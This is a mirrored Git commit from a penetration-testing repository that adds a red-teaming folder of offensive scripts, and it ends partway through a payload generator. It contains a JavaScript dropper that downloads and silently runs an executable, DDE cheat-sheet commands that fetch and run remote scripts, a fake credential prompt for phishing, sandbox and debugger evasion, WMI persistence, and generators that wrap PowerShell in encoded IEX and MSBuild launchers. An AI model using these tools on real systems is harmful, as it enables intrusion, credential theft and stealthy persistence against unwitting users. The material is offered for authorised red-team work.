Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2025-09-02 10:08:34 +02:00
Code Issues Packages Projects Releases Wiki Activity

Renamed directory and added new script.

Browse Source
This commit is contained in:
mb
2018-12-18 17:52:33 +01:00
parent bf6833a7cc
commit 27596f5104
26 changed files with 158 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

113
red-teaming/Export-ReconData.ps1 Normal file
View File

@ -0,0 +1,113 @@
#requires -version 2
<#
This script launches many PowerView cmdlets and stores their output
in Clixml files for later processing.
Author: Mariusz B. (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
#>
function Export-ReconData
{
$DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss")
New-Item -Name $DirName -ItemType Directory | Out-Null
Write-Output "`n:: Logs to be stored in: $DirName`n"
$ReconModuleCommands = Get-Command -Module Recon
$Commands = @()
$ReconModuleCommands `
| Where-Object {$_.Name -like "Get-Net*"} `
| Select Name `
| ForEach-Object {$Commands += $_.Name}
$Commands += "Invoke-UserHunter -ShowAll"
$Commands += "Invoke-StealthUserHunter -ShowAll"
$Commands += "Invoke-FileFinder -SearchSYSVol"
$Commands += "Invoke-ShareFinder"
$Commands += "Invoke-MapDomainTrust"
$Commands += "Find-GPOLocation"
$Commands += "Get-NetUser -AdminCount"
$Commands += "Find-ForeignUser"
$Commands += "Find-ForeignGroup"
$Commands += "Invoke-FileFinder"
$Commands | ForEach-Object {
$Name = $_
$Name -match "[A-Za-z]+-(.+)" | Out-Null
$FileName = $matches[1] + ".xml"
$FileName = $FileName -replace ' ',''
If ($Name -like "Get-Net*")
{
#$Name = $Name + " -Recurse"
}
Write-Output "--- $Name ---"
$Name | Invoke-Expression | Export-Clixml $DirName\$FileName
Write-Output "Done.`n"
}
}
function Import-ReconData
{
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
Set-Location -Path $DirName
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
$Results = Import-Clixml -Path "$_"
New-Variable -Name $Name -Force -Value $Results -Scope Global
Write-Output "Loaded `$$Name results."
}
Set-Location -Path $path
}
function Get-ReconData
{
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
$Variables = Get-Variable
Set-Location -Path $DirName
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
If ($Variables | Where-Object { $_.Name -eq $Name })
{
Write-Output "Previously loaded: `$$Name"
}
}
Set-Location -Path $path
}
Try
{
# You need to be in PowerSploit\Recon directory
Import-Module .\Recon.psm1
}
Catch [System.Exception]
{
exit
}

1
red-teaming/Invoke-Command-Cred-Example.ps1 Normal file
View File

@ -0,0 +1 @@
Invoke-Command 192.168.56.102 -Cred (New-Object -Type System.Management.Automation.PSCredential -ArgumentList "ieuser", $(ConvertTo-SecureString "Passw0rd!" -AsPlainText -Force)) {ipconfig}

28
red-teaming/Macro-Less-Cheatsheet.md Normal file
View File

@ -0,0 +1,28 @@
## Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet
- Using `regsvr32` _*.sct_ files technique:
```
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
```
- Using `HTA` files technique:
```
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
```
- Method from Empire - unfortunately unable to hide 'powershell.exe -NoP -sta -NonI' sequence
```
DDEAUTO C:\\Microsoft\\Programs\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.56.101/default.ps1');powershell -noP -sta -w 1 -enc $e "
```
- CactusTorch DDE can also generate files in **JS** and **VBS** formats.
They will utilize `cscript` as a file interpreter.
- Another option is to use scripts by _Dominic Spinosa_ found [here](https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads)
- Another option is to stick with `Unicorn` by _Dave Kennedy_
## Sources
- https://medium.com/red-team/dde-payloads-16629f4a2fcd

139
red-teaming/MacroDetectSandbox.vbs Normal file
View File

@ -0,0 +1,139 @@
Private Declare PtrSafe Function isDbgPresent Lib "kernel32" Alias "IsDebuggerPresent" () As Boolean
Public Function IsFileNameNotAsHexes() As Boolean
Dim str As String
Dim hexes As Variant
Dim only_hexes As Boolean
only_hexes = True
hexes = Array("0", "1", "2", "3", "4", "5", "6", "7", _
"8", "9", "a", "b", "c", "d", "e", "f")
str = ActiveDocument.name
str = Mid(str, 1, InStrRev(str, ".") - 1)
For i = 1 To UBound(hexes, 1) - 1
Dim ch As String
ch = LCase(Mid(str, i, 1))
If Not (UBound(Filter(hexes, ch)) > -1) Then
' Character not in hexes array.
only_hexes = False
Exit For
End If
Next
only_hexes = (Not only_hexes)
IsFileNameNotAsHexes = only_hexes
End Function
Public Function IsProcessListReliable() As Boolean
Dim objWMIService, objProcess, colProcess
Dim strComputer, strList
Dim bannedProcesses As Variant
bannedProcesses = Array("fiddler", "vxstream", _
"tcpview", "vmware", "procexp", "vmtools", "autoit", _
"wireshark", "procmon", "idaq", "autoruns", "apatedns", _
"windbg")
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colProcess = objWMIService.ExecQuery _
("Select * from Win32_Process")
For Each objProcess In colProcess
For Each proc In bannedProcesses
If InStr(LCase(objProcess.name), LCase(proc)) <> 0 Then
' Found banned process.
IsProcessListReliable = False
Exit Function
End If
Next
Next
If isDbgPresent() Then
IsProcessListReliable = False
Exit Function
End If
IsProcessListReliable = (colProcess.Count() > 50)
End Function
Public Function IsHardwareReliable() As Boolean
Dim objWMIService, objItem, colItems, strComputer
Dim totalSize, totalMemory, cpusNum As Integer
totalSize = 0
totalMemory = 0
cpusNum = 0
Const wbemFlagReturnImmediately = &H10
Const wbemFlagForwardOnly = &H20
strComputer = "."
' Checking total HDD size
Set objWMIService = GetObject _
("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_LogicalDisk")
For Each objItem In colItems
Dim num
num = Int(objItem.Size / 1073741824)
If num > 0 Then
totalSize = totalSize + num
End If
Next
If totalSize < 60 Then
' Total HDD size of the machine must be at least 60GB
IsHardwareReliable = False
Exit Function
End If
' Checking Memory
Set colComputer = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objComputer In colComputer
totalMemory = totalMemory + Int((objComputer.TotalPhysicalMemory) / 1048576) + 1
Next
If totalMemory < 1024 Then
' Total Memory is less than 1GB
IsHardwareReliable = False
Exit Function
End If
Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _
wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems2
cpusNum = cpusNum + objItem.NumberOfLogicalProcessors
Next
If cpusNum < 2 Then
' Nowadays everyone has at least 2 logical cores.
IsHardwareReliable = False
Exit Function
End If
IsHardwareReliable = True
End Function
Public Function IsRunningInSandbox() As Boolean
Dim test As Boolean
If IsFileNameNotAsHexes() <> True Then
IsRunningInSandbox = True
Exit Function
ElseIf IsProcessListReliable() <> True Then
IsRunningInSandbox = True
Exit Function
ElseIf IsHardwareReliable() <> True Then
IsRunningInSandbox = True
Exit Function
End If
IsRunningInSandbox = False
End Function

24
red-teaming/Phish-Creds.ps1 Normal file
View File

@ -0,0 +1,24 @@
<#
try {
(Get-Credential -Credential $null).GetNetworkCredential() |
Select-Object @{name="User"; expression = {
If ($_.Domain -ne [string]::Empty) {
"{0}\{1}" -f ($_.Domain), ($_.UserName)
} Else {
$_.UserName
}
}
}, Password | Format-List
} catch {
}
One can additionally add, right after Get-Credential following parameters that could improve
pretext's quality during social engineering attempt:
-Credential domain\username - when we know our victim's domain and/or username - we can supply this info to the dialog
-Message "Some luring sentence" - to include some luring message
#>
try { ((Get-Credential -Credential $null).GetNetworkCredential() | Select-Object @{name="User"; expression={If ($_.Domain -ne [string]::Empty) {"{0}\{1}" -f ($_.Domain), ($_.UserName)} Else { $_.UserName} }}, Password | Format-List) } catch { }

177
red-teaming/README.md Normal file
View File

@ -0,0 +1,177 @@
## Red Teaming and Social-Engineering related scripts, tools and CheatSheets
- **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))
- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
Example:
```
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
```
- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-Net*`, `Invoke-*` into _Clixml_ files. Those files can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread.
Exposed functions:
- `Export-ReconData` - Launches many cmdlets and exports their Clixml outputs.
- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
```
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
Loaded $FileFinderSearchSYSVol results.
Loaded $FileFinder results.
Loaded $ForeignGroup results.
Loaded $ForeignUser results.
Loaded $GPOLocation results.
Loaded $MapDomainTrust results.
Loaded $NetComputer results.
Loaded $NetDomain results.
Loaded $NetDomainController results.
Loaded $NetDomainTrust results.
Loaded $NetFileServer results.
Loaded $NetForest results.
Loaded $NetForestCatalog results.
Loaded $NetForestDomain results.
Loaded $NetForestTrust results.
Loaded $NetGPO results.
Loaded $NetGPOGroup results.
Loaded $NetGroup results.
Loaded $NetGroupMember results.
Loaded $NetLocalGroup results.
Loaded $NetLoggedon results.
Loaded $NetOU results.
Loaded $NetProcess results.
Loaded $NetRDPSession results.
Loaded $NetSession results.
Loaded $NetShare results.
Loaded $NetSite results.
Loaded $NetSubnet results.
Loaded $NetUserAdminCount results.
Loaded $NetUser results.
Loaded $ShareFinder results.
Loaded $StealthUserHunterShowAll results.
Loaded $UserHunterShowAll results.
```
- **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb))
Example output **not minimized**:
```
C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildPowershellXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<Target Name="btLDoraXcZV">
<hwiJYmWvD />
</Target>
<UsingTask TaskName="hwiJYmWvD" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class hwiJYmWvD : Task {
public override bool Execute() {
byte[] payload = System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSDRzSUFJOUxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW01U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZVczNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0TXo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs=");
string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
------------------------------------------------------------------------------------
```
**minimized**
```
C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 -m
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><Target Name="mYOYInAFWE"><DpaYaokgauWBJbe /></Target><UsingTask TaskName="DpaYaokgauWBJbe" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System.Management.Automation;using System.Management.Automation.Runspaces;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class DpaYaokgauWBJbe:Task{public override bool Execute(){byte[] x=System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSDRzSUFMQkxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW01U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZVczNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0TXo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs=");string d=System.Text.Encoding.UTF8.GetString(x);Runspace r=RunspaceFactory.CreateRunspace();r.Open();Pipeline p=r.CreatePipeline();p.Commands.AddScript(d);p.Invoke();r.Close();return true;}}]]></Code></Task></UsingTask></Project>
------------------------------------------------------------------------------------
```
- **`Invoke-Command-Cred-Example.ps1`** - Example of using PSRemoting with credentials passed directly from command line. ([gist](https://gist.github.com/mgeeky/de4ecf952ddce774d241b85cfbf97faf))
- **`MacroDetectSandbox.vbs`** - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
- **`Macro-Less-Cheatsheet.md`** - Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet ([gist](https://gist.github.com/mgeeky/981213b4c73093706fc2446deaa5f0c5))
- **`macro-psh-stdin-author.vbs`** - VBS Social Engineering Macro with Powershell invocation taking arguments from Author property and feeding them to StdIn. ([gist](https://gist.github.com/mgeeky/50c4b7fa22d930a80247fea62755fbd3))
- **`msbuild-powershell-msgbox.xml`** - Example of Powershell execution via MSBuild inline task XML file. On a simple Message-Box script.
([gist](https://gist.github.com/mgeeky/617c54a23f0c4e99e6f475e6af070810))
- **`muti-stage-1.md`** - Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process. ([gist](https://gist.github.com/mgeeky/6097ea56e0f541aa7d98161e2aa76dfb))
- **`Phish-Creds.ps1`** - Powershell oneline Credentials Phisher - to be used in malicious Word Macros/VBA/HTA or other RCE commands on seized machine. ([gist](https://gist.github.com/mgeeky/a404d7f23c85954650d686bb3f02abaf))
One can additionally add, right after `Get-Credential` following parameters that could improve pretext's quality during social engineering attempt:
- `-Credential domain\username` - when we know our victim's domain and/or username - we can supply this info to the dialog
- `-Message "Some luring sentence"` - to include some luring message
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
- **`set-handler.rc`** - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. ([gist](https://gist.github.com/mgeeky/bf4d732aa6e602ca9b77d089fd3ea7c9))
- **`SubstitutePageMacro.vbs`** - This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named `RealDoc` (configured via variable `autoTextTemplateName` ). ([gist](https://gist.github.com/mgeeky/3c705560c5041ab20c62f41e917616e6))
- **`warnings\EN-Word.docx`** and **`warnings\EN-Excel.docx`** - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons.
- **`WMIPersistence.vbs`** - Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up. ([gist](https://gist.github.com/mgeeky/d00ba855d2af73fd8d7446df0f64c25a))
- **`Various-Macro-Based-RCEs.md`** - Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
- **`vba-macro-mac-persistence.vbs`** - (WIP) Working on VBA-based MacPersistance functionality for MS Office for Mac Macros. ([gist](https://gist.github.com/mgeeky/dd184e7f50dfab5ac97b4855f23952bc))
- **`vba-windows-persistence.vbs`** - VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run. ([gist](https://gist.github.com/mgeeky/07ffbd9dbb64c80afe05fb45a0f66f81))
- [**`VisualBasicObfuscator`**](https://github.com/mgeeky/VisualBasicObfuscator) - Visual Basic Code universal Obfuscator intended to be used during penetration testing assignments.

74
red-teaming/SubstitutePageMacro.vbs Normal file
View File

@ -0,0 +1,74 @@
Public alreadyLaunched As Integer
Private Sub Malware()
'
' ============================================
'
' Enter here your malware code here.
' It will be started on auto open surely.
'
' ============================================
MsgBox ("Here comes the malware!")
' ============================================
End Sub
Private Sub Launch()
If alreadyLaunched = True Then
Exit Sub
End If
Malware
SubstitutePage
alreadyLaunched = True
End Sub
Private Sub SubstitutePage()
'
' This routine will take the entire Document's contents,
' delete them and insert in their place contents defined in
' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
'
Dim doc As Word.Document
Dim firstPageRange As Range
Dim rng As Range
Dim autoTextTemplateName As String
' This is the name of the defined AutoText prepared in the document,
' to be inserted in place of previous contents.
autoTextTemplateName = "RealDoc"
Set firstPageRange = Word.ActiveDocument.Range
firstPageRange.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Set doc = ActiveDocument
Set rng = doc.Sections(1).Range
doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
doc.Save
End Sub
Sub AutoOpen()
' Becomes launched as first on MS Word
Launch
End Sub
Sub Document_Open()
' Becomes launched as second, another try, on MS Word
Launch
End Sub
Sub Auto_Open()
' Becomes launched as first on MS Excel
Launch
End Sub
Sub Workbook_Open()
' Becomes launched as second, another try, on MS Excel
Launch
End Sub

1169
red-teaming/Various-Macro-Based-RCEs.md Normal file
View File

File diff suppressed because it is too large Load Diff

77
red-teaming/WMIPersistence.vbs Normal file
View File

@ -0,0 +1,77 @@
'
' SYNOPSIS:
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
' USAGE:
' WMIPersistence("command to be launched", "taskName")
'
' EXAMPLE:
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
Dim filterName, consumerName As String
Dim objLocator, objService1
Dim objInstances1, objInstances2, objInstances3
Dim newObj1, newObj2, newObj3
On Error GoTo Failed
filterName = taskName & "Event"
consumerName = taskName & "Consumer"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService1 = objLocator.ConnectServer(".", "root\subscription")
'
' Step 1: Set WMI Instance of type Event Filter
'
Set objInstances1 = objService1.Get("__EventFilter")
' The malware originally will kicks in after roughly 3 minutes since System gets up.
' One can modify this delay time by modifying the WHERE clausule of the below query.
query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
& "AND TargetInstance.SystemUpTime >= 200 AND " _
& "TargetInstance.SystemUpTime < 320"
' New object of type __EventFilter
Set newObj1 = objInstances1.Spawninstance_
newObj1.name = filterName
newObj1.eventNamespace = "root\cimv2"
newObj1.QueryLanguage = "WQL"
newObj1.query = query
newObj1.Put_
'
' Step 2: Set WMI instance of type: CommandLineEventConsumer
'
Set objInstances2 = objService1.Get("CommandLineEventConsumer")
Set newObj2 = objInstances2.Spawninstance_
newObj2.name = consumerName
newObj2.CommandLineTemplate = exePath
newObj2.Put_
'
' Step 3: Set WMI instance of type: Filter To Consumer Binding
'
Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
Set newObj3 = objInstances3.Spawninstance_
newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
newObj3.Put_
WMIPersistence = True
Exit Function
Failed:
WMIPersistence = False
End Function

26
red-teaming/backdoor-drop.js Normal file
View File

@ -0,0 +1,26 @@
<script>
var SRC = "";
var CMDLINE = "";
var out = Math.random().toString(36).substring(7) + ".exe";
var axo = this.ActiveXObject;
var wshell = new axo("WScript.Shell");
var path = wshell.ExpandEnvironmentStrings("%TEMP%") + "/" + out;
var xhr = new axo("MSXML2.XMLHTTP");
xhr.onreadystatechange = function () {
if (xhr.readystate === 4) {
var adodb = new axo("ADODB.Stream");
adodb.open();
adodb.type = 1;
adodb.write(xhr.ResponseBody);
adodb.position = 0;
adodb.saveToFile(path, 2);
adodb.close();
};
};
try {
xhr.open("GET", SRC, false);
xhr.send();
wshell.Run(path + " " + CMDLINE, 0, false);
} catch (err) { };
</script>

69
red-teaming/clickOnceSharpPickTemplate.cs Normal file
View File

@ -0,0 +1,69 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Resources;
using System.Net;
using System.Collections.ObjectModel;
//
// Use NuGet to install System.Management.Automation reference.
//
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace ConsoleApplication2
{
class Program
{
//
// This function and concept comes from PowerPick / SharpPick project by Sixdub:
// https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
//
static string RunPS(string cmd)
{
// Init stuff
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
// Add commands
pipeline.Commands.AddScript(cmd);
// Prep PS for string output and invoke
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
// Convert records to strings
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
static void Main()
{
Console.WriteLine("Updating ClickOnce application. Please wait...");
//
// Here comes your Base64 encoded Powershell payload.
// A good example of what to stick in here is a modified Invoke-Shellcode.ps1
// that will spawn a process and insert there some shellcode.
// You can prepare Base64 UTF8 shellcode via:
// PS> $text = Get-Content yourShellcode.ps1
// PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text);
// PS> $encoded = [Convert]::ToBase64String($bytes);
// PS> $encoded | Out-File "myEncodedShellcode.ps1"
//
String base64encodedPayload = "<INSERT HERE YOUR BASE64 ENCODED POWERSHELL PAYLOAD>";
RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))");
}
}
}

30
red-teaming/compressedPowershell.py Normal file
View File

@ -0,0 +1,30 @@
#!/usr/bin/python3
import io
import sys
import gzip
import base64
def main(argv):
if len(argv) < 2:
print('Usage: ./compressedPowershell.py <input>')
sys.exit(-1)
out = io.BytesIO()
encoded = ''
with open(argv[1], 'rb') as f:
inp = f.read()
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
fo.write(inp)
encoded = base64.b64encode(out.getvalue())
powershell = '''$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String("{}"));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'''.format(encoded.decode())
print(powershell)
if __name__ == '__main__':
main(sys.argv)

12
red-teaming/delete-warning-div-macro.vbs Normal file
View File

@ -0,0 +1,12 @@
Private Sub DeleteWarningPicture(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
Dim shape As Word.shape
For Each shape In ActiveDocument.Shapes
If StrComp(shape.Name, textBoxName) = 0 Then
shape.Delete
Exit For
End If
Next
If saveDocAfter Then
ActiveDocument.Save
End If
End Sub

234
red-teaming/generateMSBuildPowershellXML.py Normal file
View File

@ -0,0 +1,234 @@
#!/usr/bin/python3
#
# Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or
# .NET/CLR assembly EXE file into inline-task XML file that can be further launched by:
# %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#
# Requirements:
# - pefile
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
#
import re
import io
import sys
import gzip
import base64
import string
import struct
import random
import argparse
try:
import pefile
except ImportError:
print('Missing requirement: "pefile". Install it using: pip install pefile')
sys.exit(-1)
def getCompressedPayload(filePath):
out = io.BytesIO()
encoded = ''
with open(filePath, 'rb') as f:
inp = f.read()
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
fo.write(inp)
encoded = base64.b64encode(out.getvalue())
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
encoded.decode()
)
return powershell
def getInlineTask(payload, exeFile):
templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
powershellLaunchCode = string.Template('''<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class $templateName : Task {
public override bool Execute() {
byte[] payload = System.Convert.FromBase64String("$payload2");
